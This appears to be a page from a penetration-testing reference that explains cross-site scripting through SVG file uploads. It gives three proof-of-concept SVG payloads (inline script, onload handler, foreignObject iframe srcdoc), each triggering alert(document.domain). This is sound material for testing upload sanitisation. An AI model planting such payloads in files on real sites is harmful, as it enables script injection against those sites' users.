XSS via SVG file upload

SVG files can contain embedded JavaScript code that executes when the image is rendered in a browser.

Example

Download as file: svg-document-domain-xss-34-.svg

SVG with inline script tag

xml

<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
   <rect width="124" height="124" rx="24" fill="#000000"/>
   <script type="text/javascript">
      alert(document.domain)
   </script>
</svg>

Further examples

SVG with an event handler attribute (`onload`)

Download as file: svg-onload-document-domain-xss.svg

xml

<svg xmlns="http://www.w3.org/2000/svg" width="400" height="400" viewBox="0 0 124 124" fill="none">
   <rect width="124" height="124" rx="24" fill="#000000" onload="alert(document.domain)"/>
</svg>

SVG `foreignObject` with `iframe srcdoc`

Download as file: svg-foreignobject-iframe-srcdoc-xss.svg

xml

<svg xmlns="http://www.w3.org/2000/svg">
   <foreignObject width="100" height="100">
      <iframe xmlns="http://www.w3.org/1999/xhtml"  srcdoc="<script>alert(document.domain)</script>"></iframe>
   </foreignObject>
</svg>

Kerberos delegation

Basic knowledge

Misconfigurations

XSS via SVG file upload

Example

SVG with inline script tag

Further examples

SVG with an event handler attribute (`onload`)

SVG `foreignObject` with `iframe srcdoc`

XSS via SVG file upload ​

Example ​

SVG with inline script tag ​

Further examples ​

SVG with an event handler attribute (onload) ​

SVG foreignObject with iframe srcdoc ​

XSS via SVG file upload

Example

SVG with inline script tag

Further examples

SVG with an event handler attribute (`onload`)

SVG `foreignObject` with `iframe srcdoc`